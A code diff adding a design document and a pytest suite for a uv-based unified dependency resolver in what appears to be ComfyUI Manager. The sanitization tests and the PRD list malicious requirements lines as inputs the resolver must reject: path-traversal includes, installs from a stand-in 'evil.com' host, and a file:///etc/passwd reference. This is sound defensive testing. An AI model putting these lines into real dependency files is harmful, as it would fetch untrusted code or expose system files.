docs/dev/PRD-unified-dependency-resolver.md
Normal file
@ -0,0 +1,355 @@
|
||||
# PRD: Unified Dependency Resolver
|
||||
|
||||
## 1. Overview
|
||||
|
||||
### 1.1 Background
|
||||
ComfyUI Manager currently installs each node pack's `requirements.txt` individually via `pip install`.
|
||||
This approach causes dependency conflicts where installing a new node pack can break previously installed node packs' dependencies.
|
||||
|
||||
**Current flow:**
|
||||
```mermaid
|
||||
graph LR
|
||||
A1[Install node pack A] --> A2[pip install A's deps] --> A3[Run install.py]
|
||||
B1[Install node pack B] --> B2[pip install B's deps] --> B3[Run install.py]
|
||||
B2 -.->|May break<br/>A's deps| A2
|
||||
```
|
||||
|
||||
### 1.2 Goal
|
||||
Implement a unified dependency installation module that uses `uv` to resolve all dependencies (installed node packs + new node packs) at once.
|
||||
|
||||
**New flow (unified resolver mode):**
|
||||
```mermaid
|
||||
graph TD
|
||||
subgraph "Install Time (immediate)"
|
||||
A1[User installs node pack X] --> A2[Git clone / download]
|
||||
A2 --> A3["Run X's install.py (if exists)"]
|
||||
A3 --> A4["Skip per-node pip install<br/>(deps deferred to restart)"]
|
||||
end
|
||||
|
||||
subgraph "ComfyUI Restart (startup batch)"
|
||||
B1[prestartup_script.py] --> B2[Collect ALL installed node packs' deps]
|
||||
B2 --> B3["uv pip compile → pinned requirements.txt"]
|
||||
B3 --> B4["uv pip install -r → Batch install"]
|
||||
B4 --> B5[PIPFixer environment correction]
|
||||
end
|
||||
```
|
||||
|
||||
> **Terminology**: In this document, "lockfile" refers to the **pinned requirements.txt** generated by `uv pip compile`.
|
||||
> This is different from the `uv.lock` (TOML format) generated by `uv lock`. We use a pip-compatible workflow.
|
||||
|
||||
### 1.3 Scope
|
||||
- Develop a new dedicated dependency resolution module
|
||||
- Opt-in activation from the existing install process
|
||||
- **Handles dependency resolution (deps install) only**. `install.py` execution is handled by existing logic
|
||||
|
||||
---
|
||||
|
||||
## 2. Constraints
|
||||
|
||||
| Item | Description |
|
||||
|------|-------------|
|
||||
| **uv required** | Only operates in environments where `uv` is available |
|
||||
| **Independent of `use_uv` flag** | `use_unified_resolver` is separate from the existing `use_uv` flag. Even if `use_uv=False`, setting `use_unified_resolver=True` attempts resolver activation. Auto-fallback if uv is not installed |
|
||||
| **Pre-validated list** | Input node pack list is assumed to be pre-verified for mutual dependency compatibility |
|
||||
| **Backward compatibility** | Existing pip-based install process is fully preserved (fallback) |
|
||||
| **Blacklist/overrides bypassed** | In unified mode, `pip_blacklist`, `pip_overrides`, `pip_downgrade_blacklist` are NOT applied (empty values passed). Constructor interface is preserved for future extensibility. `uv pip compile` handles all conflict resolution natively. **[DEFERRED]** Reading actual values from `cm_global` at startup is deferred to a future version — v1 always passes empty values |
|
||||
| **Multiple custom_nodes paths** | Supports all paths returned by `folder_paths.get_folder_paths('custom_nodes')` |
|
||||
| **Scope of application** | Batch resolver runs at **module scope** in `prestartup_script.py` (unconditionally when enabled, independent of `install-scripts.txt` existence). The 2 `execute_install_script()` locations skip per-node pip install when unified mode is active (deps deferred to restart). `execute_lazy_install_script()` is also modified to skip per-node pip install in unified mode. Other install paths such as `install_manager_requirements()`, `pip_install()` are outside v1 scope (future extension) |
|
||||
| **Legacy module** | `comfyui_manager/legacy/manager_core.py` is excluded from modification. Legacy paths retain existing pip behavior |
|
||||
|
||||
---
|
||||
|
||||
## 3. Functional Requirements
|
||||
|
||||
### FR-1: Node Pack List and Base Dependency Input
|
||||
|
||||
**Input:**
|
||||
- Node pack list (fullpath list of installed + to-be-installed node packs)
|
||||
- Base dependencies (ComfyUI's `requirements.txt` and `manager_requirements.txt`)
|
||||
|
||||
**Behavior:**
|
||||
- Validate each node pack path
|
||||
- Exclude disabled (`.disabled`) node packs
|
||||
- Detection criteria: Existence of `custom_nodes/.disabled/{node_pack_name}` **directory**
|
||||
- Existing mechanism: Disabling a node pack **moves** it from `custom_nodes/` to `custom_nodes/.disabled/` (does NOT create a `.disabled` file inside the node pack)
|
||||
- At resolver input time, disabled node packs should already be absent from `custom_nodes/`, so normally they won't be in `node_pack_paths`
|
||||
- Defensively exclude any node pack paths that are within the `.disabled` directory
|
||||
- Base dependencies are treated as constraints
|
||||
- Traverse all paths from `folder_paths.get_folder_paths('custom_nodes')`
|
||||
|
||||
**`cm_global` runtime dependencies:**
|
||||
- `cm_global.pip_overrides`, `pip_blacklist`, `pip_downgrade_blacklist` are dynamically assigned during `prestartup_script.py` execution
|
||||
- In unified mode, these are **not applied** — empty values are passed to the resolver constructor
|
||||
- The constructor interface accepts these parameters for future extensibility (defaults to empty when `None`)
|
||||
|
||||
### FR-2: Dependency List Extraction
|
||||
|
||||
**Behavior:**
|
||||
- Parse `requirements.txt` from each node pack directory
|
||||
- Encoding: Use `robust_readlines()` pattern (`chardet` detection, assumes UTF-8 if not installed)
|
||||
- Package name remapping (constructor accepts `overrides` dict — **empty in v1**, interface preserved for extensibility)
|
||||
- Blacklist package filtering (constructor accepts `blacklist` set — **empty in v1**, uv handles torch etc. natively)
|
||||
- Downgrade blacklist filtering (constructor accepts `downgrade_blacklist` list — **empty in v1**)
|
||||
- **Note**: In unified mode, `uv pip compile` resolves all version conflicts natively. The blacklist/overrides/downgrade_blacklist mechanisms from the existing pip flow are bypassed
|
||||
- Strip comments (`#`) and blank lines
|
||||
- **Input sanitization** (see below)
|
||||
- Separate handling of `--index-url` entries (see below)
|
||||
|
||||
**Input sanitization:**
|
||||
- Requirements lines matching the following patterns are **rejected and logged** (security defense):
|
||||
- `-r`, `--requirement` (recursive include → path traversal risk)
|
||||
- `-e`, `--editable` (VCS/local path install → arbitrary code execution risk)
|
||||
- `-c`, `--constraint` (external constraint file injection)
|
||||
- `--find-links`, `-f` (external package source specification)
|
||||
- `@ file://` (local file reference → path traversal risk)
|
||||
- Package names containing path separators (`/`, `\`)
|
||||
- Allowed items: Package specs (`name>=version`), specs with `--index-url`, environment markers (containing `;`)
|
||||
- Rejected lines are recorded in the `skipped` list with reason
|
||||
|
||||
**`--index-url` handling:**
|
||||
- Existing code (standalone function `execute_install_script()`) parses `package_name --index-url URL` format for special handling
|
||||
- **Note**: The class method `UnifiedManager.execute_install_script()` does NOT have this handling (asymmetric)
|
||||
- The unified resolver **unifies both paths** for consistent handling:
|
||||
- Package spec → added to the general dependency list
|
||||
- `--extra-index-url URL` → passed as `uv pip compile` argument
|
||||
- Separated index URLs are collected in `CollectedDeps.extra_index_urls`
|
||||
- **Credential redaction**: Authentication info (`user:pass@`) in index URLs is masked during logging
|
||||
|
||||
**Duplicate handling strategy:**
|
||||
- No deduplication is performed directly
|
||||
- Different version specs of the same package are **all passed as-is** to uv
|
||||
- `uv pip compile` handles version resolution (uv determines the optimal version)
|
||||
|
||||
**Output:**
|
||||
- Unified dependency list (tracked by source node pack)
|
||||
- Additional index URL list
|
||||
|
||||
### FR-3: uv pip compile Execution
|
||||
|
||||
**Behavior:**
|
||||
- Generate temporary requirements file from the collected dependency list
|
||||
- Execute `uv pip compile` to produce a pinned requirements.txt
|
||||
- `--output-file` (required): Specify output file (outputs to stdout only if not specified)
|
||||
- `--constraint`: Pass base dependencies as constraints
|
||||
- `--python`: Current Python interpreter path
|
||||
- `--extra-index-url`: Additional index URLs collected from FR-2 (multiple allowed)
|
||||
- Resolve for the current platform (platform-specific results)
|
||||
|
||||
**Error handling:**
|
||||
- Return conflict package report when resolution fails
|
||||
- Timeout handling (300s): Explicitly catch `subprocess.TimeoutExpired`, terminate child process, then fallback
|
||||
- Lockfile output file existence verification: Confirm file was actually created even when `returncode == 0`
|
||||
- Temp file cleanup: Guaranteed in `finally` block. Includes stale temp file cleanup logic at next execution for abnormal termination (SIGKILL) scenarios
|
||||
|
||||
**Output:**
|
||||
- pinned requirements.txt (file with all packages pinned to exact versions)
|
||||
|
||||
### FR-4: Pinned Requirements-based Dependency Installation
|
||||
|
||||
**Behavior:**
|
||||
- Execute `uv pip install -r <pinned-requirements.txt>`
|
||||
- **Do NOT use `uv pip sync`**: sync deletes packages not in the lockfile, risking removal of torch, ComfyUI's own dependencies, etc.
|
||||
- Already-installed packages at the same version are skipped (default uv behavior)
|
||||
- Log installation results
|
||||
|
||||
**Error handling:**
|
||||
- `uv pip install -r` is an **atomic operation** (all-or-nothing)
|
||||
- On total failure: Parse stderr for failure cause report → fallback to existing pip
|
||||
- **No partial failure report** (not possible due to uv's behavior)
|
||||
- `InstallResult`'s `installed`/`skipped` fields are populated by parsing uv stdout; `stderr` records failure cause (no separate `failed` field needed due to atomic model)
|
||||
|
||||
### FR-5: Post-install Environment Correction
|
||||
|
||||
**Behavior:**
|
||||
- Call `PIPFixer.fix_broken()` for environment integrity correction
|
||||
- Restore torch version (when change detected)
|
||||
- Fix OpenCV conflicts
|
||||
- Restore comfyui-frontend-package
|
||||
- Restore packages based on `pip_auto_fix.list`
|
||||
- **This step is already performed in the existing `execute_install_script()` flow, so the unified resolver itself doesn't need to call it**
|
||||
- However, an optional call option is provided for cases where the resolver is invoked independently outside the existing flow
|
||||
|
||||
### FR-6: install.py Execution (Existing Flow Maintained)
|
||||
|
||||
**Behavior:**
|
||||
- The unified resolver handles deps installation **at startup time only**
|
||||
- `install.py` execution is handled by the existing `execute_install_script()` flow and runs **immediately** at install time
|
||||
- Deps are deferred to startup batch resolution; `install.py` runs without waiting for deps
|
||||
|
||||
**Control flow specification (unified mode active):**
|
||||
- `execute_install_script()`: **skip** the `requirements.txt`-based individual pip install loop entirely (deps will be resolved at next restart)
|
||||
- `install.py` execution runs **immediately** as before
|
||||
- At next ComfyUI restart: `prestartup_script.py` runs the unified resolver for all installed node packs
|
||||
|
||||
**Control flow specification (unified mode inactive / fallback):**
|
||||
- Existing pip install loop runs as-is (no change)
|
||||
- `install.py` execution runs **immediately** as before
|
||||
|
||||
### FR-7: Startup Batch Resolution
|
||||
|
||||
**Behavior:**
|
||||
- When `use_unified_resolver=True`, **all dependency resolution is deferred to ComfyUI startup**
|
||||
- At install time: node pack itself is installed (git clone, etc.) and `install.py` runs immediately, but `requirements.txt` deps are **not** installed per-request
|
||||
- At startup time: `prestartup_script.py` runs the unified resolver once for all installed node packs
|
||||
|
||||
**Startup execution flow (in `prestartup_script.py`):**
|
||||
1. At **module scope** (before `execute_startup_script()` gate): check `manager_util.use_unified_resolver` flag
|
||||
2. If enabled: collect all installed node pack paths, read base requirements from `comfy_path`
|
||||
3. Create `UnifiedDepResolver` with empty blacklist/overrides/downgrade_blacklist (uv handles resolution natively)
|
||||
4. Call `resolve_and_install()` — collects all deps → compile → install in one batch
|
||||
5. On success: set `_unified_resolver_succeeded = True`, skip per-node pip in `execute_lazy_install_script()`
|
||||
6. On failure: log warning, `execute_lazy_install_script()` falls back to existing per-node pip install
|
||||
7. **Note**: Runs unconditionally when enabled, independent of `install-scripts.txt` existence
|
||||
|
||||
**`execute_install_script()` behavior in unified mode:**
|
||||
- Skip the `requirements.txt` pip install loop entirely (deps will be handled at restart)
|
||||
- `install.py` execution still runs immediately
|
||||
|
||||
**`execute_lazy_install_script()` behavior in unified mode:**
|
||||
- Skip the `requirements.txt` pip install loop (already handled by startup batch resolver)
|
||||
- `install.py` execution still runs
|
||||
|
||||
**Windows-specific behavior:**
|
||||
- Windows lazy install path also benefits from startup batch resolution
|
||||
- `try_install_script()` defers to `reserve_script()` as before for non-`instant_execution=True` installs
|
||||
|
||||
---
|
||||
|
||||
## 4. Non-functional Requirements
|
||||
|
||||
| Item | Requirement |
|
||||
|------|-------------|
|
||||
| **Performance** | Equal to or faster than existing individual installs |
|
||||
| **Stability** | Must not break the existing environment |
|
||||
| **Logging** | Log progress and results at each step (details below) |
|
||||
| **Error recovery** | Fallback to existing pip method on failure |
|
||||
| **Testing** | Unit test coverage above 80% |
|
||||
| **Security** | requirements.txt input sanitization (see FR-2), credential log redaction, subprocess list-form invocation |
|
||||
| **Concurrency** | Prevent lockfile path collisions on concurrent install requests. Use process/thread-unique suffixes or temp directories |
|
||||
| **Temp files** | Guarantee temp file cleanup on both normal and abnormal termination. Clean stale files on next execution |
|
||||
|
||||
### Logging Requirements
|
||||
|
||||
| Step | Log Level | Content |
|
||||
|------|-----------|---------|
|
||||
| Resolver start | `INFO` | Node pack count, total dependency count, mode (unified/pip) |
|
||||
| Dependency collection | `INFO` | Collection summary (collected N, skipped N, sources N) |
|
||||
| Dependency collection | `DEBUG` | Per-package collection/skip/remap details |
|
||||
| `--index-url` detection | `INFO` | Detected additional index URL list |
|
||||
| uv compile start | `INFO` | Execution command (excluding sensitive info) |
|
||||
| uv compile success | `INFO` | Pinned package count, elapsed time |
|
||||
| uv compile failure | `WARNING` | Conflict details, fallback transition notice |
|
||||
| Install start | `INFO` | Number of packages to install |
|
||||
| Install success | `INFO` | Installed/skipped/failed count summary, elapsed time |
|
||||
| Install failure | `WARNING` | Failed package list, fallback transition notice |
|
||||
| Fallback transition | `WARNING` | Transition reason, original error message |
|
||||
| Overall completion | `INFO` | Final result summary (success/fallback/failure) |
|
||||
|
||||
> **Log prefix**: All logs use `[UnifiedDepResolver]` prefix to distinguish from existing pip install logs
|
||||
|
||||
---
|
||||
|
||||
## 5. Usage Scenarios
|
||||
|
||||
### Scenario 1: Single Node Pack Installation (unified mode)
|
||||
```
|
||||
User requests installation of node pack X
|
||||
→ Git clone / download node pack X
|
||||
→ Run X's install.py (if exists) — immediately
|
||||
→ Skip per-node pip install (deps deferred)
|
||||
→ User restarts ComfyUI
|
||||
→ prestartup_script.py: Collect deps from ALL installed node packs (A,B,C,X)
|
||||
→ uv pip compile resolves fully compatible versions
|
||||
→ uv pip install -r for batch installation
|
||||
→ PIPFixer environment correction
|
||||
```
|
||||
|
||||
### Scenario 2: Multi Node Pack Batch Installation (unified mode)
|
||||
```
|
||||
User requests installation of node packs X, Y, Z
|
||||
→ Each node pack: git clone + install.py — immediately
|
||||
→ Per-node pip install skipped for all
|
||||
→ User restarts ComfyUI
|
||||
→ prestartup_script.py: Collect deps from ALL installed node packs (including X,Y,Z)
|
||||
→ Single uv pip compile → single uv pip install -r
|
||||
→ PIPFixer environment correction
|
||||
```
|
||||
|
||||
### Scenario 3: Dependency Resolution Failure (Edge Case)
|
||||
```
|
||||
Even pre-validated lists may fail due to uv version differences or platform issues
|
||||
→ uv pip compile failure → return conflict report
|
||||
→ Display conflict details to user
|
||||
→ Auto-execute existing pip fallback
|
||||
```
|
||||
|
||||
### Scenario 4: uv Not Installed
|
||||
```
|
||||
uv unavailable detected → auto-fallback to existing pip method
|
||||
→ Display uv installation recommendation to user
|
||||
```
|
||||
|
||||
### Scenario 5: Windows Lazy Installation (unified mode)
|
||||
```
|
||||
Node pack installation requested on Windows
|
||||
→ Node pack install deferred to startup (existing lazy mechanism)
|
||||
→ On next ComfyUI startup: unified resolver runs first (batch deps)
|
||||
→ execute_lazy_install_script() skips per-node pip (already resolved)
|
||||
→ install.py still runs per node pack
|
||||
```
|
||||
|
||||
### Scenario 6: Malicious/Non-standard requirements.txt
|
||||
```
|
||||
Node pack's requirements.txt contains `-r ../../../etc/hosts` or `-e git+https://...`
|
||||
→ Sanitization filter rejects the line
|
||||
→ Log rejection reason and continue processing remaining valid packages
|
||||
→ Notify user of rejected item count
|
||||
```
|
||||
|
||||
### Scenario 7: Concurrent Install Requests (unified mode)
|
||||
```
|
||||
User requests installation of node packs A and B nearly simultaneously from UI
|
||||
→ Each request: git clone + install.py immediately, deps skipped
|
||||
→ On restart: single unified resolver run handles both A and B deps together
|
||||
→ No concurrency issue (single batch at startup)
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## 6. Success Metrics
|
||||
|
||||
| Metric | Target |
|
||||
|--------|--------|
|
||||
| Dependency conflict reduction | 90%+ reduction compared to current |
|
||||
| Install success rate | 99%+ (for compatibility-verified lists) |
|
||||
| Performance | Equal to or better than existing individual installs |
|
||||
| Adoption rate | 50%+ of eligible users |
|
||||
|
||||
---
|
||||
|
||||
## 7. Future Extensions
|
||||
|
||||
- **`cm_global` integration** [DEFERRED]: Read `pip_blacklist`, `pip_overrides`, `pip_downgrade_blacklist` from `cm_global` runtime values instead of passing empty. Constructor interface already accepts these parameters
|
||||
- Lockfile caching: Reuse for identical node pack configurations
|
||||
- Pre-install dependency conflict validation API: Check compatibility before installation
|
||||
- Dependency tree visualization: Display dependency relationships to users
|
||||
- `uv lock`-based cross-platform lockfile support (TOML format)
|
||||
- `install_manager_requirements()` integration: Resolve manager's own dependencies through unified resolver
|
||||
- `pip_install()` integration: Route UI direct installs through unified resolver
|
||||
- Legacy module (`comfyui_manager/legacy/`) unified resolver support
|
||||
|
||||
---
|
||||
|
||||
## Appendix A: Existing Code Install Path Mapping
|
||||
|
||||
> This section is reference material to clarify the unified resolver's scope of application.
|
||||
|
||||
| Install Path | Location | v1 Applied | Notes |
|
||||
|-------------|----------|------------|-------|
|
||||
| `UnifiedManager.execute_install_script()` | `glob/manager_core.py` (method) | ✅ Yes | Skips per-node pip in unified mode (deps deferred to restart) |
|
||||
| Standalone `execute_install_script()` | `glob/manager_core.py` (function) | ✅ Yes | Skips per-node pip in unified mode (deps deferred to restart) |
|
||||
| `execute_lazy_install_script()` | `prestartup_script.py` | ✅ Yes | Skips per-node pip in unified mode (already batch-resolved) |
|
||||
| Startup batch resolver | `prestartup_script.py` | ✅ Yes | **New**: Runs unified resolver once at startup for all node packs |
|
||||
| `install_manager_requirements()` | `glob/manager_core.py` | ❌ No | Manager's own deps |
|
||||
| `pip_install()` | `glob/manager_core.py` | ❌ No | UI direct install |
|
||||
| Legacy `execute_install_script()` (2 locations) | `legacy/manager_core.py` | ❌ No | Legacy paths |
|
||||
999
tests/test_unified_dep_resolver.py
Normal file
999
tests/test_unified_dep_resolver.py
Normal file
@ -0,0 +1,999 @@
|
||||
"""Tests for comfyui_manager.common.unified_dep_resolver."""
|
||||
|
||||
from __future__ import annotations
|
||||
|
||||
import importlib
|
||||
import importlib.util
|
||||
import os
|
||||
import shutil
|
||||
import subprocess
|
||||
import sys
|
||||
import tempfile
|
||||
import time
|
||||
import types
|
||||
from unittest import mock
|
||||
|
||||
import pytest
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# Import the module under test by loading it directly, replacing the
|
||||
# ``from . import manager_util`` relative import with a fake module.
|
||||
# This avoids needing the full ComfyUI runtime.
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
# Mapping returned by the fake ``get_installed_packages`` below; tests may
# populate it to simulate the currently-installed package set.
_MOCK_INSTALLED_PACKAGES: dict[str, str] = {}
|
||||
|
||||
|
||||
class _FakeStrictVersion:
    """Minimal replica of manager_util.StrictVersion for testing.

    Parses up to three dot-separated integer components
    (``major.minor.patch``); missing components default to ``0``.
    Non-integer components raise ``ValueError`` (deliberately strict).
    """

    def __init__(self, version_string: str) -> None:
        parts = version_string.split('.')
        self.major = int(parts[0])
        self.minor = int(parts[1]) if len(parts) > 1 else 0
        self.patch = int(parts[2]) if len(parts) > 2 else 0

    def _key(self) -> tuple[int, int, int]:
        # Single source of truth for every comparison below.
        return (self.major, self.minor, self.patch)

    def __ge__(self, other: object) -> bool:
        if not isinstance(other, _FakeStrictVersion):
            # Return NotImplemented (instead of raising AttributeError) so
            # Python can try the reflected operation on ``other``.
            return NotImplemented
        return self._key() >= other._key()

    def __eq__(self, other: object) -> bool:
        if not isinstance(other, _FakeStrictVersion):
            return NotImplemented
        return self._key() == other._key()

    def __lt__(self, other: object) -> bool:
        if not isinstance(other, _FakeStrictVersion):
            return NotImplemented
        return self._key() < other._key()

    # Defining __eq__ implicitly sets __hash__ to None; restore hashability
    # consistently with equality so instances can live in sets/dict keys.
    def __hash__(self) -> int:
        return hash(self._key())

    def __repr__(self) -> str:
        return f"{type(self).__name__}('{self.major}.{self.minor}.{self.patch}')"
|
||||
|
||||
|
||||
def _fake_get_installed_packages(renew: bool = False) -> dict[str, str]:
    """Stand-in for manager_util.get_installed_packages; ``renew`` is ignored."""
    packages = _MOCK_INSTALLED_PACKAGES
    return packages
|
||||
|
||||
|
||||
def _fake_robust_readlines(path: str) -> list[str]:
    """Stand-in for manager_util.robust_readlines: plain UTF-8 line read."""
    with open(path, "r", encoding="utf-8") as handle:
        # Iterating a text file yields the same newline-terminated lines
        # that readlines() would produce.
        return list(handle)
|
||||
|
||||
|
||||
# Build a fake manager_util module exposing only the three attributes the
# resolver actually uses (StrictVersion, get_installed_packages,
# robust_readlines), so the full ComfyUI runtime never has to be imported.
_manager_util_fake = types.ModuleType("comfyui_manager.common.manager_util")
_manager_util_fake.StrictVersion = _FakeStrictVersion
_manager_util_fake.get_installed_packages = _fake_get_installed_packages
_manager_util_fake.robust_readlines = _fake_robust_readlines

# Ensure parent packages exist in sys.modules so the module under test's
# relative import (``from . import manager_util``) can resolve.
if "comfyui_manager" not in sys.modules:
    sys.modules["comfyui_manager"] = types.ModuleType("comfyui_manager")
if "comfyui_manager.common" not in sys.modules:
    _common_mod = types.ModuleType("comfyui_manager.common")
    sys.modules["comfyui_manager.common"] = _common_mod
    sys.modules["comfyui_manager"].common = _common_mod  # type: ignore[attr-defined]

# Inject the fake manager_util — this must happen BEFORE exec_module below,
# otherwise the module under test would try to import the real one.
sys.modules["comfyui_manager.common.manager_util"] = _manager_util_fake
sys.modules["comfyui_manager.common"].manager_util = _manager_util_fake  # type: ignore[attr-defined]

# Now load the module under test via spec (direct file load rather than a
# package import, again avoiding the package __init__ and its dependencies).
_MODULE_PATH = os.path.join(
    os.path.dirname(__file__), os.pardir,
    "comfyui_manager", "common", "unified_dep_resolver.py",
)
_spec = importlib.util.spec_from_file_location(
    "comfyui_manager.common.unified_dep_resolver",
    os.path.abspath(_MODULE_PATH),
)
assert _spec is not None and _spec.loader is not None
_udr_module = importlib.util.module_from_spec(_spec)
# Register under its canonical name before executing the module body.
sys.modules[_spec.name] = _udr_module
_spec.loader.exec_module(_udr_module)

# Pull symbols into the test namespace (public API plus the private
# constants/patterns the sanitization tests assert against).
CollectedDeps = _udr_module.CollectedDeps
InstallResult = _udr_module.InstallResult
LockfileResult = _udr_module.LockfileResult
PackageRequirement = _udr_module.PackageRequirement
ResolveResult = _udr_module.ResolveResult
UnifiedDepResolver = _udr_module.UnifiedDepResolver
UvNotAvailableError = _udr_module.UvNotAvailableError
collect_base_requirements = _udr_module.collect_base_requirements
collect_node_pack_paths = _udr_module.collect_node_pack_paths
_CREDENTIAL_PATTERN = _udr_module._CREDENTIAL_PATTERN
_DANGEROUS_PATTERNS = _udr_module._DANGEROUS_PATTERNS
_TMP_PREFIX = _udr_module._TMP_PREFIX
_VERSION_SPEC_PATTERN = _udr_module._VERSION_SPEC_PATTERN
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# Helpers
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
def _make_node_pack(tmp: str, name: str, requirements: str | None = None) -> str:
|
||||
"""Create a fake node pack directory with optional requirements.txt."""
|
||||
path = os.path.join(tmp, name)
|
||||
os.makedirs(path, exist_ok=True)
|
||||
if requirements is not None:
|
||||
with open(os.path.join(path, "requirements.txt"), "w") as f:
|
||||
f.write(requirements)
|
||||
return path
|
||||
|
||||
|
||||
def _resolver(
    paths: list[str],
    blacklist: set[str] | None = None,
    overrides: dict[str, str] | None = None,
    downgrade_blacklist: list[str] | None = None,
) -> UnifiedDepResolver:
    """Construct a UnifiedDepResolver, substituting empty collections for None."""
    effective_blacklist = blacklist or set()
    effective_overrides = overrides or {}
    effective_downgrades = downgrade_blacklist or []
    return UnifiedDepResolver(
        node_pack_paths=paths,
        blacklist=effective_blacklist,
        overrides=effective_overrides,
        downgrade_blacklist=effective_downgrades,
    )
|
||||
|
||||
|
||||
# ===========================================================================
|
||||
# Data class instantiation
|
||||
# ===========================================================================
|
||||
|
||||
class TestDataClasses:
    """Smoke tests: each result dataclass instantiates with expected defaults."""

    def test_package_requirement(self):
        req = PackageRequirement(name="torch", spec="torch>=2.0", source="/packs/a")
        assert req.name == "torch"
        assert req.spec == "torch>=2.0"

    def test_collected_deps_defaults(self):
        deps = CollectedDeps()
        assert deps.requirements == []
        assert deps.skipped == []
        assert deps.sources == {}
        assert deps.extra_index_urls == []

    def test_lockfile_result(self):
        lock_result = LockfileResult(success=True, lockfile_path="/tmp/x.txt")
        assert lock_result.success
        assert lock_result.conflicts == []

    def test_install_result(self):
        install_result = InstallResult(success=False, stderr="boom")
        assert not install_result.success
        assert install_result.installed == []

    def test_resolve_result(self):
        resolve_result = ResolveResult(success=True)
        assert resolve_result.collected is None
        assert resolve_result.error is None
|
||||
|
||||
|
||||
# ===========================================================================
|
||||
# collect_requirements
|
||||
# ===========================================================================
|
||||
|
||||
class TestCollectRequirements:
    """collect_requirements(): parsing, filtering, and source-tracking behavior."""

    def test_normal_parsing(self, tmp_path):
        pack = _make_node_pack(str(tmp_path), "pack_a", "numpy>=1.20\nrequests\n")
        collected = _resolver([pack]).collect_requirements()
        assert len(collected.requirements) == 2
        seen = {entry.name for entry in collected.requirements}
        assert "numpy" in seen
        assert "requests" in seen

    def test_empty_requirements(self, tmp_path):
        pack = _make_node_pack(str(tmp_path), "pack_a", "")
        collected = _resolver([pack]).collect_requirements()
        assert collected.requirements == []

    def test_no_requirements_file(self, tmp_path):
        # Pack directory without any requirements.txt at all.
        pack = _make_node_pack(str(tmp_path), "pack_a")
        collected = _resolver([pack]).collect_requirements()
        assert collected.requirements == []

    def test_comment_and_blank_handling(self, tmp_path):
        pack = _make_node_pack(str(tmp_path), "pack_a", "# comment\n\nnumpy\n \n")
        collected = _resolver([pack]).collect_requirements()
        assert len(collected.requirements) == 1

    def test_inline_comment_stripping(self, tmp_path):
        pack = _make_node_pack(str(tmp_path), "pack_a", "numpy>=1.0 # pin version\n")
        collected = _resolver([pack]).collect_requirements()
        assert collected.requirements[0].spec == "numpy>=1.0"

    def test_blacklist_filtering(self, tmp_path):
        pack = _make_node_pack(str(tmp_path), "pack_a", "torch\nnumpy\ntorchaudio\n")
        collected = _resolver(
            [pack], blacklist={"torch", "torchaudio"}
        ).collect_requirements()
        assert len(collected.requirements) == 1
        assert collected.requirements[0].name == "numpy"
        assert len(collected.skipped) == 2

    def test_remap_application(self, tmp_path):
        pack = _make_node_pack(str(tmp_path), "pack_a", "old-package\n")
        collected = _resolver(
            [pack], overrides={"old-package": "new-package>=1.0"}
        ).collect_requirements()
        assert collected.requirements[0].spec == "new-package>=1.0"

    def test_disabled_path_new_style(self, tmp_path):
        # Packs living under a ``.disabled`` directory are defensively excluded.
        disabled_root = os.path.join(str(tmp_path), ".disabled")
        pack = _make_node_pack(disabled_root, "pack_a", "numpy\n")
        collected = _resolver([pack]).collect_requirements()
        assert collected.requirements == []

    def test_disabled_path_old_style(self, tmp_path):
        # Old-style ``<name>.disabled`` directory suffix is also excluded.
        pack = _make_node_pack(str(tmp_path), "pack_a.disabled", "numpy\n")
        collected = _resolver([pack]).collect_requirements()
        assert collected.requirements == []

    def test_duplicate_specs_kept(self, tmp_path):
        pack_one = _make_node_pack(str(tmp_path), "pack_a", "numpy>=1.20\n")
        pack_two = _make_node_pack(str(tmp_path), "pack_b", "numpy>=1.22\n")
        collected = _resolver([pack_one, pack_two]).collect_requirements()
        duplicates = [entry for entry in collected.requirements if entry.name == "numpy"]
        assert len(duplicates) == 2  # both specs preserved; uv resolves the version

    def test_sources_tracking(self, tmp_path):
        pack_one = _make_node_pack(str(tmp_path), "pack_a", "numpy\n")
        pack_two = _make_node_pack(str(tmp_path), "pack_b", "numpy\n")
        collected = _resolver([pack_one, pack_two]).collect_requirements()
        assert len(collected.sources["numpy"]) == 2
|
||||
|
||||
|
||||
# ===========================================================================
|
||||
# Input sanitization
|
||||
# ===========================================================================
|
||||
|
||||
class TestInputSanitization:
    """Dangerous requirements.txt lines are rejected; benign specs are kept."""

    @pytest.mark.parametrize("line", [
        "-r ../../../etc/hosts",
        "--requirement secret.txt",
        "-e git+https://evil.com/repo",
        "--editable ./local",
        "-c constraint.txt",
        "--constraint external.txt",
        "--find-links http://evil.com/pkgs",
        "-f http://evil.com/pkgs",
        "evil_pkg @ file:///etc/passwd",
    ])
    def test_dangerous_patterns_rejected(self, line, tmp_path):
        pack = _make_node_pack(str(tmp_path), "pack_a", line + "\n")
        collected = _resolver([pack]).collect_requirements()
        assert collected.requirements == []
        assert len(collected.skipped) == 1
        assert "rejected" in collected.skipped[0][1]

    def test_path_separator_rejected(self, tmp_path):
        pack = _make_node_pack(str(tmp_path), "pack_a", "../evil/pkg\n")
        collected = _resolver([pack]).collect_requirements()
        assert collected.requirements == []
        assert "path separator" in collected.skipped[0][1]

    def test_backslash_rejected(self, tmp_path):
        pack = _make_node_pack(str(tmp_path), "pack_a", "evil\\pkg\n")
        collected = _resolver([pack]).collect_requirements()
        assert collected.requirements == []

    def test_valid_spec_with_version(self, tmp_path):
        pack = _make_node_pack(str(tmp_path), "pack_a", "numpy>=1.20\n")
        collected = _resolver([pack]).collect_requirements()
        assert len(collected.requirements) == 1

    def test_environment_marker_allowed(self, tmp_path):
        pack = _make_node_pack(
            str(tmp_path), "pack_a", 'pywin32>=300; sys_platform=="win32"\n'
        )
        collected = _resolver([pack]).collect_requirements()
        assert len(collected.requirements) == 1
|
||||
|
||||
|
||||
# ===========================================================================
|
||||
# --index-url separation
|
||||
# ===========================================================================
|
||||
|
||||
class TestIndexUrlSeparation:
    """``--index-url`` / ``--extra-index-url`` options are stripped from
    requirement lines and collected into ``extra_index_urls`` instead."""

    def test_index_url_split(self, tmp_path):
        pack = _make_node_pack(
            str(tmp_path), "pack_a",
            "torch --index-url https://download.pytorch.org/whl/cu121\n")
        collected = _resolver([pack]).collect_requirements()
        assert len(collected.requirements) == 1
        assert collected.requirements[0].name == "torch"
